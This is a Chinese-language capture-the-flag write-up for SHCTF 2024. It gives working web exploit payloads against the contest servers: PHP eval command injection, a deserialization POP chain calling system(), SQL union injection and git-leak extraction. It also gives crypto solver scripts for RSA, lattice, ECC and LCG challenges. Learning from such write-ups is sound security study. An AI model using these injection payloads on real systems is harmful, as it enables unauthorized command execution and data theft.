SHCTF2024-WriteUp

https://ctf.qlu.edu.cn
平台不知道什么时候关闭

尼玛，新生赛一堆，newstar 0xgame都只是打了一下就不想打了，忙不过来了，屁事太多了

还好山河明智，第二周就把新生标签摘了，然后我第一周打的多一些，后面基本是，下密码的附件来看看了

欸，居然有37

week1

web

单身十八年的手速

game.js

1zflask

/robots.txt，/s3recttt，/api?SSHCTFF=cat /flag

蛐蛐?蛐蛐!

/source.txt，修复乱码

<?php
if($_GET['ququ'] == 114514 && strrev($_GET['ququ']) != 415411){
    if($_POST['ququ']!=null){
        $eval_param = $_POST['ququ'];
        if(strncmp($eval_param,'ququk1',6)===0){
            eval($_POST['ququ']);
        }else{
            echo("可以让fault的蛐蛐变成现实么\n");
        }
    }
    echo("蛐蛐成功第一步！\n");

}
else{
    echo("呜呜呜fault还是要出题");
}

/check.php?ququ=114514%00，post：ququ=ququk1;system("cat /flag");或者使用别的分割符同样可以命令执行

ez_gittt

git泄露有的工具下不到源码，点名批评

pip install GitHacker
githacker --url http://entry.shc.tf:45317/.git/ --output-folder result
cd result/cb5763aae21e1c5821db1b400953e7f1/.git
git diff 1b2133e98f25813443f66f845153fa0c1c33fd1b 8dd1651ac6dc576566720781e603a606d9cea330

poppopop

<?php
class SH {

    public static $Web = false;
    public static $SHCTF = false;
}
class C {
    public $p;

    public function flag()
    {
        ($this->p)();
    }
}
class T {

    public $n;
    public function __destruct()
    {

        SH::$Web = true;
        echo $this->n;
    }
}
class F {
    public $o;
    public function __toString()
    {
        SH::$SHCTF = true;
        $this->o->flag();
        return "其实。。。。,";
    }
}
class SHCTF {
    public $isyou="system";
    public $flag="cat /flllag";
    public function __invoke()
    {
        if (SH::$Web) {

            ($this->isyou)($this->flag);
            echo "小丑竟是我自己呜呜呜~";
        } else {
            echo "小丑别看了!";
        }
    }
}
$a=new T();
$a->n=new F();
$a->n->o=new C();
$a->n->o->p=new SHCTF();
echo base64_encode(serialize($a));

jvav

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

public class demo {
    public static void main(String[] args) {
        try {
            // 创建Runtime对象
            Runtime runtime = Runtime.getRuntime();
            // 执行系统命令
            Process process = runtime.exec("cat /flag");

            // 读取命令的输出
            BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }

            // 等待命令执行完成
            process.waitFor();
        } catch (IOException | InterruptedException e) {
            e.printStackTrace();
        }
    }
}

MD5 Master

<?php
highlight_file(__file__);

$master = "MD5 master!";

if(isset($_POST["master1"]) && isset($_POST["master2"])){
    if($master.$_POST["master1"] !== $master.$_POST["master2"] && md5($master.$_POST["master1"]) === md5($master.$_POST["master2"])){
        echo $master . "<br>";
        echo file_get_contents('/flag');
    }
}
else{
    die("master? <br>");
}

master拼接两个参数后的MD5要相同，恰好fastcoll就是干这个的，新建文本文件，把前缀写进去保存，拖入exe文件

import requests
with open("sh_msg1.txt", 'rb')as f:
    a = f.read()[11:]
with open("sh_msg2.txt", 'rb')as f:
    b = f.read()[11:]
url = 'http://entry.shc.tf:21869/'
res = requests.post(url, data={"master1": a, "master2": b})
print(res.text)

crypto

Hello Crypto

print(long_to_bytes(m).decode())

EzAES

from Crypto.Util.number import *
from Crypto.Cipher import AES

with open("chall.py", 'rb')as f:
    file = f.readlines()
    for line in file:
        print(line.decode(), end='')

c = b'\xd0\xe2d\xe5T\xf9\xd2\xc8U0\xfb\xc8\xcd]b\xf8\x85\xc8\xbe\xa4\xcc3c\x99[\xbd\t(f\x10\xb5D>\xe0\xde\x05\x16\x0b\xdc\x92\xd3\xb0\x1f-PN\xa8P'
iv = b'QWO\xa0\xe8tIvH\xbf\xed\x82~P\xac\xb4'
key = b'\x10:\x0f~\x1bWl\xad\x7f\xf7\xb8\x91\x8f$\xd6\xeb'
aes = AES.new(key, AES.MODE_CBC, iv)
print(aes.decrypt(c).decode())

factor

from Crypto.Util.number import *
import random
from enc import flag

m = bytes_to_long(flag)
e = 65537
def prod(iterable):
    result = 1
    for num in iterable:
        result *= num
    return result
prime_list = [getPrime(64) for _ in  range(10) ]
N = prod(prime_list)
p_list = random.sample(prime_list,7)
n = prod(p_list)
c = pow(m,e,n)
print(f"c = {c}")
print(f"N = {N}")

yafu分解

from Crypto.Util.number import *
import itertools

c = 982057246005841122681719726162449275140402636679137501643344871376145083063016298600959370629453243515753285445832736433034476775497
N = 111727941450518685645880500356518853696393581139199683397655873524434398483719707355658359575956205560295208672611108319343069181170539103809784492328225885104488345034732063873819178228473087
e = 65537
prime_list = [9750009592369937929, 17631783225707169887, 14897435311328090363, 12219342310321289621, 12027757975747737973,
              15158171038546021043, 16488560220293550973, 10283692020046850117, 11073201121963691101, 10429529301865387397]
p_all_list = list(itertools.permutations(prime_list, 7))
for i in p_all_list:
    phi = 1
    n = 1
    for p in i:
        phi *= p-1
        n *= p
    if GCD(e, phi) == 1:
        d = inverse(e, phi)
        flag = long_to_bytes(pow(c, d, n))
        if b'SHCTF' in flag:
            print(flag.decode())
            break

d_known

from Crypto.Util.number import *
from gmpy2 import*
from flag import flag

m = bytes_to_long(flag)
p = getPrime(1024)
q = next_prime(p)
n = p * q
e = 0x10001
d = inverse(e, (p-1) * (q-1))
c = pow(m, e, n)
print(c)
print(d)
"""
c = 5128269945205941681657162690752124645147095603307776642558620464753149474351813432516302175895967604322423895428085228263377444072843608756088456978614813713707998220343468702704788501256758288635169563164297803428146056603182717915240126485071421659045280467383314498992918502931984546850909367496851620848827787411420736564351902392039206384433279115493991042882911016903299425217764902721104855561290614026117785416484916861798527602885421517301667939650766352244742052165224414400947997222256406536694670357685537325088273890185902387069072204887202971094744552181245341549936791944865465378905842980222407851742
d = 3790271832736808378164485821342007847088299208140809668714802444291303279665930976642897262924930591631798761435880895708714697550489226406467924717484448076572088547295409148608378512478441170191291934724323097031903250264336964541317492561494853799000315044170684567389237337841599036163417916443756372926924022073020766718666542437634977043398727757614795102093582095109387147251701718216785864028290558113041981262382167416454071080366899471219871742443782268440377640255755782371837790956244466349724371425724180875521438840621722917440786455543247168529379012719810694051987668057392173716950629707189238453793
e = 0x10001
"""

打印发现d.bit_length()=2045，跟n差不多大了，我们又知道$e*d-1=k\phi(n)$，$\phi(n)\approx n$，所以k在[1,e]之间，对$\phi(n)$开平方会得到一个大于p的数，那么我们找小于它的附近的一个素数即可，q就是这个素数的下一个

from Crypto.Util.number import *
import gmpy2
from sympy import *

c = 5128269945205941681657162690752124645147095603307776642558620464753149474351813432516302175895967604322423895428085228263377444072843608756088456978614813713707998220343468702704788501256758288635169563164297803428146056603182717915240126485071421659045280467383314498992918502931984546850909367496851620848827787411420736564351902392039206384433279115493991042882911016903299425217764902721104855561290614026117785416484916861798527602885421517301667939650766352244742052165224414400947997222256406536694670357685537325088273890185902387069072204887202971094744552181245341549936791944865465378905842980222407851742
d = 3790271832736808378164485821342007847088299208140809668714802444291303279665930976642897262924930591631798761435880895708714697550489226406467924717484448076572088547295409148608378512478441170191291934724323097031903250264336964541317492561494853799000315044170684567389237337841599036163417916443756372926924022073020766718666542437634977043398727757614795102093582095109387147251701718216785864028290558113041981262382167416454071080366899471219871742443782268440377640255755782371837790956244466349724371425724180875521438840621722917440786455543247168529379012719810694051987668057392173716950629707189238453793
e = 0x10001
print(d.bit_length())
for i in range(1, e):
    if (e*d-1) % i != 0:
        continue
    phi = (e*d-1)//i
    p = gmpy2.iroot(phi, 2)[0]
    p = prevprime(p)
    q = nextprime(p)
    if (p-1)*(q-1) == phi:
        n = p*q
        print(long_to_bytes(pow(c, d, n)).decode())
        break

baby_mod

from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
r = getPrime(777)
t = getPrime(777)
tmp = getPrime(15)
e = 65537
n = p*q
print(f"c = {pow(m,e,n)}")
print(f"leak = {p*r-q*t-tmp}")
print(f"r = {r}")
print(f"t = {t}")
'''
c = 25900013611745459234449421352128550791380405075852427844520047672976045705053669812761027512471099887955926922807763156068475467691843960238860198209869207050769506000272083846340089993442226307892271915673319497925726165266677353649105096919576206677557645681229463591571683344132256764727867218414475821414
leak = 1315576698569519021825869605558080173961766113174117516895155642458801441613594247202719705730125235122134470528523180642252331178634029317505467190118181724443647215388521217342902429209926124347180537512385923020087294072947165058918179896904165121851416283369980345261683209548370901441893420488465961879888423704643272728339367303995737167427397015998668341503217114591217674582342979
r = 449509105386333182769495605541266433612190248649889527500668938725282197092696225044504839710548395681491923335485736430311542544811714539401973591141967042310944552061762227459161233997399455785984753772614529066263632633766099414193
t = 466570739651607385339907801250236144323523615960304899132337822754876522678249651820805564899362256608057888046522867494446053404906721052232912923778440295889959052577191557765649038942151814731893947704867634072305897918671425093691
'''

参考https://dexterjie.github.io/2024/08/06/赛题复现/SRCTF/#Baby
小改一下

# sage
Ge = Matrix(ZZ,[
    [leak,0,0,0],
    [r,1,0,0],
    [-t,0,1,0],
    [1,0,0,2^500]
])

当时给新生赛出题，找点资料，突然翻到了Lst4r师傅的一篇wp，发现这东西原来是丢番图方程，$pr-qt=leak+temp$与$ax+by=c$形式一致，只要$GCD(a,b)=d|c$，则方程有解，这好像跟解同余方程有一点的联系啊，然后推导过程，其实这里就是GCD(a,b)=1，才有了后面的东西
$ax-by=c$
$ax\equiv c(mod\ b)$
$x=c*a^{-1}(mod\ b)$
$y=(ax-c)//b$
说实话，格版本的还不能很能看懂目前
然后又去看了同余方程，以为二者互通解法，其实只要ab互素包直接出的，但我那题同余方程是不互素的，所以逆元不存在，然后出题不小心选的是互素的，这下改小小，就还回来我同余方程的预期解法了，差点要非预期
总结就是，互素都是直接出，二者没有本质区别；不互素，同余方程求解还是得靠egcd，毕竟二者还是同一个东西吧，所以都还是egcd
本道题运用的其实就取模和整除

from tqdm import *
from Crypto.Util.number import *

e = 65537
c = 25900013611745459234449421352128550791380405075852427844520047672976045705053669812761027512471099887955926922807763156068475467691843960238860198209869207050769506000272083846340089993442226307892271915673319497925726165266677353649105096919576206677557645681229463591571683344132256764727867218414475821414
leak = 1315576698569519021825869605558080173961766113174117516895155642458801441613594247202719705730125235122134470528523180642252331178634029317505467190118181724443647215388521217342902429209926124347180537512385923020087294072947165058918179896904165121851416283369980345261683209548370901441893420488465961879888423704643272728339367303995737167427397015998668341503217114591217674582342979
r = 449509105386333182769495605541266433612190248649889527500668938725282197092696225044504839710548395681491923335485736430311542544811714539401973591141967042310944552061762227459161233997399455785984753772614529066263632633766099414193
t = 466570739651607385339907801250236144323523615960304899132337822754876522678249651820805564899362256608057888046522867494446053404906721052232912923778440295889959052577191557765649038942151814731893947704867634072305897918671425093691
for i in tqdm(range(2**14, 2**15)):
    p = (leak+i)*inverse(r, t) % t
    q = (r*p-(leak+i))//t
    if q > 0:
        n = p*q
        if GCD(e,(p-1)*(q-1))==1:
            d = inverse(e, (p-1)*(q-1))
            flag = long_to_bytes(pow(c, d, n))
            if b'SHCTF{' in flag:
                print(f'{p = }')
                print(f'{q = }')
                print(flag)
                break
# p = 10828571852464331341712150217058916119291334034775990469361200035678740509774480669454106468384506195444300931477689490439063149020461676127989241184154737
# q = 7612918354236349590305500410457447666517294016150410935511115244808748864036428494251452016172971676206380973588984417215894793791556907054138118188367171
# b'SHCTF{39066b49-7c3f-47a3-a7d7-546c11048817}'
# 64%

misc

签到题

SHCTF我又踏马来辣！，延续去年传统

拜师之旅①

png头尾缺失补齐，crc校验，宽高不对python Deformed-Image-Restorer.py -i roxy.png

真真假假?遮遮掩掩!

一开始还以为是伪加密，一看又是山河经典的掩码SHCTF??????FTCHS

Rasterizing Traffic()

有fake flag，流量包有图片grating.png，导出保存

光栅图片，没找到工具解……

week2

web

guess_the_number

/s0urce

import flask
import random
from flask import Flask, request, render_template, send_file

app = Flask(__name__)

@app.route('/')
def index():
    return render_template('index.html', first_num = first_num)  

@app.route('/s0urce')
def get_source():
    file_path = "app.py"
    return send_file(file_path, as_attachment=True)
    
@app.route('/first')
def get_first_number():
    return str(first_num)
    
@app.route('/guess')
def verify_seed():
    num = request.args.get('num')
    if num == str(second_num):
        with open("/flag", "r") as file:
            return file.read()
    return "nonono"
 
def init():
    global seed, first_num, second_num
    seed = random.randint(1000000,9999999)
    random.seed(seed)
    first_num = random.randint(1000000000,9999999999)
    second_num = random.randint(1000000000,9999999999)

init()
app.run(debug=True)

随机数种子缺陷

import random
import requests
from tqdm import *

first_num = 5277451103
for i in tqdm(range(1000000, 9999999)):
    random.seed(i)
    test = random.randint(1000000000, 9999999999)
    if test == first_num:
        second_num = random.randint(1000000000, 9999999999)
        res = requests.get(
            f'http://210.44.150.15:25622/guess?num={second_num}')
        print(res.text)
        break

自助查询

?id=") or 1=1#，先闭合看看能不能实现注入，很明显看见只有两列

SELECT username,password FROM users WHERE id = ("1") or 1 union select 1,database()#
库名：ctf

SELECT username,password FROM users WHERE id = ("1") or 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctf'#
表名：flag,users

SELECT username,password FROM users WHERE id = ("1") or 1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#
flag表的字段名：id,scretdata

SELECT username,password FROM users WHERE id = ("1") or 1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
users表的字段名：id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

SELECT username,password FROM users WHERE id = ("1") or 1 union select 1,group_concat(scretdata) from flag#
被你查到了, 果然不安全,把重要的东西写在注释就不会忘了

对列进行查询

# 查列名
SELECT username,password FROM users WHERE id = ("1") or 1 union SELECT database(),column_name FROM information_schema.columns
# 查列内容
SELECT username,password FROM users WHERE id = ("1") or 1 union SELECT database(),column_comment FROM information_schema.columns

crypto

worde很大

题目

import gmpy2
from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
n = p*q
e = getPrime(200)
d = gmpy2.invert(e,(p-1)*(q-1))
dp = d % (p-1)
c = pow(m,e,n)

print(f"n = {n}")
print(f"c = {c}")
print(f"e = {e}")
print(f"dp = {dp}")
'''
n = 82247919658489810380240839087349167312391675556067956600144360018088524333106039088812004869379422909437743425492911024763226188814125737536109723777661903520234200005812281602815883855435148880431018374620973909944500345461605934516034328785791858741385301710414531253610756328999895737908157933318003199437
c = 19004135050577774560981288431097099079736191413880885912007978892726509267290991113342873896047249218117502631896913170767293584589689916540020860025359287210204445330821495515587691705398818016395710639666764267452777850179744742716838946605733861264261086076963704643146910966580500292644632757738898750640
e = 1222271536436538502303564845180492076631965040858206171530223
dp = 5756836428205079089595585945891670886537656746897710776494815731928932139888141976203071290262270694899459619924115230892248604680645140941830553958594301
'''

见https://hvang10.github.io/2024/08/12/第四届山石CTF训练营/
babyrsa，构造费马

from Crypto.Util.number import *
p = GCD(pow(2, e*dp, n)-2, n)
print(long_to_bytes(pow(c, dp, p)))

魔鬼的步伐

题目

from Crypto.Util.number import *
from random import choice
from enc import flag

m = bytes_to_long(flag)
def get_primes(limit):
    primes = []
    is_prime = [True] * (limit + 1)
    for num in range(2, limit + 1):
        if is_prime[num]:
            primes.append(num)
            for multiple in range(num * num, limit + 1, num):
                is_prime[multiple] = False
    return primes

def get_Prime(bits):
    while True:
        n = 2
        while n.bit_length() < bits:
            n *= choice(primes)
        if isPrime(n + 1):
            return n + 1

e = 65537
primes = get_primes(e)
p = get_Prime(512)
q = get_Prime(512)
n = p*q
c = pow(m,e,n)
print(f"n = {n}")
print(f"e = {e}")
print(f"c = {c}")
'''
n = 33049334433301642832276449462878199425586003075363704632299361359635418571202120149638949400299018113342381561003380476578452867397448279205470367999826880102323557636492461892702632205491422046049109130726973943645824051991662952301697690337766318065326751352192106485980054784289527854584092550645702701746223881
e = 65537
c = 15394419310248814507510133312306135076155666347831968302673818044165993197079455389123001640582969004883715894754137770792509616543743423839219703779259418731422736400578259902468529503256749854724887132016186964074984277399760948419395368792639982783770903783472249503330890702692418839718262891255865389875185554
'''

get_primes()函数是基于埃拉托斯特尼筛法Sieve of Eratosthenes的变种，它是一种高效的找出一定范围内所有素数的方法，isPrime(n + 1)，可以得到本题的考点为p-1光滑

from Crypto.Util.number import *

n = 
e = 65537
c = 

def Poolard_p_1(N):
    a, n = 2, 2
    while True:
        a = pow(a, n, N)
        res = GCD(a-1, N)
        if res != 1 and res != N:
            q = N // res
            return res, q
        n += 1

p, q = Poolard_p_1(n)
d = inverse(e, (p-1)*(q-1))
print(long_to_bytes(pow(c, d, n)).decode())

something hiden

ezECC

题目

from Crypto.Util.number import *
from flag import flag

assert flag.startswith(b'SHCTF{')

m = next_prime(bytes_to_long(flag))
p = getPrime(512)
a,b = getPrime(128),getPrime(128)
E = EllipticCurve(Zmod(p),[a,b])
k = getPrime(256)
A1 = E.random_point()
A2 = A1*k
M = E.lift_x(m)
C = M+A2

print('p = ',p)
print('k = ',k)
print('A1 = ',A1)
print('C = ',C)
"""
p =  9799485259524549113003780400336995829253375211044694607315372450399356814285244762186468904824132005209991983177601498069896166228214442123763065076327679
k =  73771953838487511457389800773038323262861649769228176071578897500004883270121
A1 =  (5945412329827707694132352090606154232045921322662767755331097180167148601629747751274580872108985870208681845078153424348847330421799769770041805208089791 : 4113102573821904570542216004200810877456931033522276527318388416329888348077285857968081007666714313806776668203284797556825595791189566621228705928598709 : 1)
C = (2336301464307188733995312208152021176388718095735565422234047912672553316288080052957448196669174030921526180747767251838308335308474037066343018337141276 : 6868888273736103386336636953449998615833854869329393895956720058438723636197866928342387693671211918574357564701700555086194574821628053750572619551290025 : 1)
"""

通过给定的两个点，求出ab，问了一下出题人，题目信息貌似并不完全正确，得在前一个素数和当前素数之间进行爆破

# sage
from Crypto.Util.number import *
from sage.all import *

p =  9799485259524549113003780400336995829253375211044694607315372450399356814285244762186468904824132005209991983177601498069896166228214442123763065076327679
k =  73771953838487511457389800773038323262861649769228176071578897500004883270121
A1 =  (5945412329827707694132352090606154232045921322662767755331097180167148601629747751274580872108985870208681845078153424348847330421799769770041805208089791 , 4113102573821904570542216004200810877456931033522276527318388416329888348077285857968081007666714313806776668203284797556825595791189566621228705928598709)
C = (2336301464307188733995312208152021176388718095735565422234047912672553316288080052957448196669174030921526180747767251838308335308474037066343018337141276 , 6868888273736103386336636953449998615833854869329393895956720058438723636197866928342387693671211918574357564701700555086194574821628053750572619551290025)
a=int(inverse(A1[0]-C[0],p)*(A1[1]^2-C[1]^2-A1[0]^3+C[0]^3)%p)
b=int((A1[1]^2-A1[0]^3-a*A1[0])%p)
E = EllipticCurve(Zmod(p),[a,b])
C = E.point(C)
A1 = E.point(A1)
m = C-A1*k
print(f'm = {m[0]}')
# python
from Crypto.Util.number import *
from sympy import *
m = 133829459905635890502862981237631940794467118483270617546174979
print(long_to_bytes(m))
m1 = prevprime(m)
print(long_to_bytes(m1))
for i in range(m1, m):
    flag = long_to_bytes(i)
    if b'}' == flag[-1:]:
        print(flag.decode())

pading

题目

from Crypto.Util.number import *
import gmpy2
flag = b'SHCTF{********}'
assert len(flag) == 39
p = getPrime(512)
q = getPrime(512)
n = p * q
e = 0x3
pad = b'a_easy_problem'
c = pow(bytes_to_long(flag + pad),e,n)
print(f'n = {n}')
print(f'c = {c}')
'''
n = 97267171048088381496066192626635197453217164564868791036244179896351325689651647300515730561304963255114869511478914996031421842629280169299477338281118325550531655231549821271665600124109279443980829977781199806450042470016020636640703547622978932751689687167828765412348742136309101175003219210818245550233
c = 45010260588576847169114899728599361533379262804019563744039173126890376093283589687354320048969349244237974443778624464334226062734150084458832462402162698053900389565767914602287253167328691766940007844822055298249437834407081828025295154876721602702763359699362974932711252222438004294561141105423731699107
'''

打m高低位泄露且低加密指数

# sage
from sage.all import *
from Crypto.Util.number import *
n = 97267171048088381496066192626635197453217164564868791036244179896351325689651647300515730561304963255114869511478914996031421842629280169299477338281118325550531655231549821271665600124109279443980829977781199806450042470016020636640703547622978932751689687167828765412348742136309101175003219210818245550233
c = 45010260588576847169114899728599361533379262804019563744039173126890376093283589687354320048969349244237974443778624464334226062734150084458832462402162698053900389565767914602287253167328691766940007844822055298249437834407081828025295154876721602702763359699362974932711252222438004294561141105423731699107
m_high = bytes_to_long(b'SHCTF{')
m_low = bytes_to_long(b'}a_easy_problem')
# 6+32+15
R.< x > = PolynomialRing(Zmod(n))
f = ((m_high << 376)+x*2 ^ 120+m_low)^3-c
f = f.monic()
# 未知m中间的256位
roots = f.small_roots(X=2 ^ 256, beta=0.4,epsilon=0.02)
for root in roots:
    m = (m_high << 376)+int(root)*2 ^ 120+m_low
    print(long_to_bytes(int(m)).decode())

E&R

题目

#sage
from Crypto.Util.number import *
from secret import flag

flag = flag[6:-1]
l = len(flag)
m1 = bytes_to_long(flag[:l//2])
m2 = bytes_to_long(flag[l//2:])
#RSA
p = getPrime(256)
q = getPrime(256)
n = p * q
e = 65537
r_q = int(bin(q)[2:][::-1] , 2)
leak = p ^^ r_q
c = pow(m2,e,n)

#ECC
E = EllipticCurve(Zmod(n),[114514,1919810])
G = E.lift_x(Integer(m1))
P = G * e
print(f'leak = {leak}')
print(f'n = {n}')
print(f'c = {c}')
print(f'P = {P}')
# leak = 5599968251197363876087002284371721787318931284225671549507477934076746561842
# n = 7120275986401660066259983193598830554385933355254283093021239164350142898387660104515624591378875067038235085428170557400012848874756868985306042421950909
# c = 6803450117490196163076010186755045681029929816618361161925865477601994608941714788803007124967390157378525581080320415602012078322064392991884070073083436
# P = (4143131125485719352848137000299706175276016714942734255688381872061184989156686585992844083387698688432978380177564346382756951426943827434190895490233627 : 3879946878859691332371384275396678851932267609535096278038417524609690721322205780110680003522999409696718745532857001461869452116434787256032366267905519 : 1)

说实话leak = p ^^ r_q这个是干嘛的，如果真搞p异或q的反二进制数，确实会很棘手
但这里，n是可以直接分解的(这算非预期吧)，然后解ECC的时候，换成p的整数环Zmod(p)即可

# sage
from Crypto.Util.number import *
from sage.all import *

e = 65537
n = 7120275986401660066259983193598830554385933355254283093021239164350142898387660104515624591378875067038235085428170557400012848874756868985306042421950909
c = 6803450117490196163076010186755045681029929816618361161925865477601994608941714788803007124967390157378525581080320415602012078322064392991884070073083436
P = (4143131125485719352848137000299706175276016714942734255688381872061184989156686585992844083387698688432978380177564346382756951426943827434190895490233627 , 3879946878859691332371384275396678851932267609535096278038417524609690721322205780110680003522999409696718745532857001461869452116434787256032366267905519)
p, q = 64760524083545528318139240449356269097871629401328435356643510319660757701117, 109947782034870726628911928816041880655659770652764045401662566933641952899777
E = EllipticCurve(Zmod(p),[114514,1919810])
d = inverse(e,E.order())
P = E.point(P)
G = P*d
m1 = long_to_bytes(int(G[0])).decode()
m2 = long_to_bytes(int(pow(c, inverse(e, (p-1)*(q-1)), n))).decode()  
print('SHCTF{'+m1+m2+'}')

misc

拜师之旅②

这里其实有两张图片，并不是IDAT块隐写

遮遮掩掩?CCRC!()

很奇怪的是脚本、工具都没爆出来，然后就不管了

week3

Crypto

这一周的格，非常有意思

babyLCG

from Crypto.Util.number import *
from enc import flag

seed = bytes_to_long(flag)

a = getPrime(400)
b = getPrime(400)
p = getPrime(400)
c = []
for i in range(3):
    seed = (seed*a+b)%p
    c.append(seed>>80)
print(f'a = {a}')
print(f'b = {b}')
print(f'p = {p}')
print(f'c = {c}')

见https://www.anquanke.com/post/id/204846

# sage
from Crypto.Util.number import *

a = 1372883756826335643900860677787413612322429341217562408695781600316979078457258981362973089185243041545146300735285019651
b = 1616840322678459360621150855366547863164363611723115131556281462274428722388780711443259966667402642255207063489033321533
m = 2141565647927890574190887477298374865093041664871165032669749937281208305153989668560224928991546602875840458004855584463
h = [0,1443574395247483148644856057251704784021992383977243317841569027284868510933981790366865421760703,
     183069754718902282305773783141952247255212452217012040185014286070868216807079491063768977456425, 
     656882922755950063291884479762100383247622967393669466357663276997189742661779445200175739121700]
for i in range(len(h)):
    h[i] <<= 80
A = [1]
B = [0]
for i in range(1, len(h)-1):
    A.append(a*A[i-1] % m)
    B.append((a*B[i-1]+a*h[i]+b-h[i+1]) % m)
A = A[1:]
B = B[1:]


M = matrix(ZZ, 4, 4)

for i in range(2):
    M[i, i] = m
    M[2, i] = A[i]
    M[3, i] = B[i]
    M[i, 2] = M[i, 3] = 0
M[2, 2] = 1
M[3, 3] = 2 ^ 80
M[2, 3] = 0


# print(B)
vl = M.LLL()[0]
l1 = vl[-2]
h1 = h[1]
s1 = l1+h1
# s1 = a*seed+b %m
seed = ((s1 - b)*inverse(a, m)) % m
print(long_to_bytes(int(seed)))

Approximate_n()

from Crypto.Util.number import *
import gmpy2
from flag import flag

class gen_AGCD():
    def __init__(self):
        self.p = getPrime(512)
        self.q = getPrime(512)

    def enc_(self,M,e):
        C = pow(M,e,self.p*self.q)
        return C

    def re_n(self):
        n = self.p * self.q
        return n

    def re_approximate_n(self):
        k = getPrime(512)
        r = getPrime(247)
        n_approx = k*self.p + r
        return n_approx

if __name__ == '__main__':
    e = 65537
    m1 = flag[:len(flag)//2]
    m2 = flag[len(flag)//2:]
    Encrypt1,Encrypt2 = gen_AGCD(),gen_AGCD()
    C1,C2 = Encrypt1.enc_(bytes_to_long(m1),e),Encrypt2.enc_(bytes_to_long(m2),e)
    N1,N2 = Encrypt1.re_n(),Encrypt2.re_n()

    N1_reveal = []
    for i in range(3):
        N1_reveal.append(Encrypt1.re_approximate_n())

    N2_reveal = Encrypt2.re_approximate_n()

    print('N1 = ',N1)
    print('N1_reveal = ',N1_reveal)
    print('N2 = ',N2)
    print('N2_reveal = ',N2_reveal)
    print('C1 = ',C1)
    print('C2 = ',C2)


N1 =  96502134442306766630190365969731828363778727883130269833831263030729382766871708955277488203412149574872944055023685615073160369667055165391139363670343365821984677896491807268232979350387954877922372950950780243682743844394991203320165732899685131283935792499892753451307642209809221822663392152288471021823
N1_reveal =  [77705219796898349926839885901362391697193123906793097191996261575925849175407332321710792825082720557513850089322295414039681336092072254571699321375948951222317860652999589472915517507845841365274672577833665771086028602962109439527025487395716932924154350199931185780615439190044249004833761057553520523896, 101771374571903364376825329513075440461454871187484412108119869577359241962284106364327462518581295773967857497026500027588743941459732681237456599924841361897234722105593154233281857197289498137900009205262742274923791549949458533045513858988834611935292011332698825945015525702084909340922702830454016057656, 103308066020173388243939013455456792344591089380053927065657190729114972231966344486044059361082182275581440708206370313045480128023096558669938992589910297035965428513951908770936451635495065599156803750919438422441607375265723488664344874309433366167807148690522496265012027209017979164952732695326414177286]
N2 =  126314490047348725931925643488256867451387192778862769831444516788178825429992308851796360209421085412834951813258034674586637300071003126259472461902145059495863191644177296794378246004326313468778347471025921062822075416776435141753193055544252015777211515476648743598597767600732476604052602226710111917901
N2_reveal =  121607959929347554767372194929261215875140159338098709002526312843338792449854249114170076517560920373007281830626375354007883051759222075792058099882652989084139135581276833151653103140568975782125656853212748288106091928722346823038787133815664193186644142101267277257773877912682435219235133596307742055012
C1 =  44080512978184690656370058935616299003323581502051429639925401005903492935613231824147617079462256232777256986769059389320542984689091032347985854417804295290617849869674512129448623567972538299941390255754255527203708858792913070477546701933716837223866296707744004945466536539909767255265003029320832208959
C2 =  46651595204851181126381212982309553404707491725272581862478471261361163016056856873672585451522975118618342388104186158854329857236927126394691443786101092805387307362778152096810494593230077268362452994690142423590119812564735744326958141171384070061244342460928080183425972281861566674325530530993856201985

Lattice

import gmpy2
from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)
n = getPrime(1024)
x = getPrime(200)
hint = (x*gmpy2.invert(m,n)) % n
print(f'n = {n}')
print(f'hint = {hint}')
'''
n = 145848130693758117543412571487372860506913235602516809974808585818522269136564650276188615818190323186398953857101908968758176245420927884552132860870716227938682446515612285455042030232618089765452507888912611184083526823439265617219381992067586404368454945188603041053893851526230640924307097690926185151461
hint = 5320062530050244856400971682135383371777368095215566601290251095974038808423579214623058814514827385162275539682781206812688885576283033343821681589154704394235000387503484688642086179809749262851140803203040860523361516855245641425935013688442339456695107400868547828586043122364556477095674662788145610351
'''

简单的格，$x=k*n+m*hint$

$$\left [ \begin{matrix} k&m\\ \end{matrix} \right ] * \left [ \begin{matrix} n&0\\ hint&1\\ \end{matrix} \right ] \ = \left [ \begin{matrix} x&m\\ \end{matrix} \right ]$$

# sage
from Crypto.Util.number import *
n = 145848130693758117543412571487372860506913235602516809974808585818522269136564650276188615818190323186398953857101908968758176245420927884552132860870716227938682446515612285455042030232618089765452507888912611184083526823439265617219381992067586404368454945188603041053893851526230640924307097690926185151461
hint = 5320062530050244856400971682135383371777368095215566601290251095974038808423579214623058814514827385162275539682781206812688885576283033343821681589154704394235000387503484688642086179809749262851140803203040860523361516855245641425935013688442339456695107400868547828586043122364556477095674662788145610351
mat = [[n, 0], [hint, 1]]
M = Matrix(ZZ, mat)
x, m = M.LLL()[0]
flag = long_to_bytes(int(m)).decode()
print(flag)

大学×高中√

# sage
from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)
assert len(flag)==47
leak = cos(m).n(1000)
print(leak)
# 0.930663173858708735013864574261632487708466528608503618563619854272677238694112204757817175383567864768566170130001514302467697072153084760545849543698249360760783987526742296036337216144968878436793442305949050751417113202760217838648422727760945579644861599148512584771382319668482598215317149996430

这里我们知道的是cos(m)的前1000位，则根据反三角函数$m=arccos(leak)+2k\pi$
即$m-arccos(leak)-2k\pi=0$
构造格

$$L = \begin{bmatrix} 1 & 0 & 1 \\ 0 & 1 & arccos(leak)\\ 0 & 0 & 2\pi\\ \end{bmatrix}$$

找出线性关系

$$\begin{bmatrix} m & -1 & -k \end{bmatrix} * \begin{bmatrix} 1 & 0 & 1 \\ 0 & 1 & arccos(leak)\\ 0 & 0 & 2\pi\\ \end{bmatrix} \ = \begin{bmatrix} m & -1 & 0 \end{bmatrix}$$

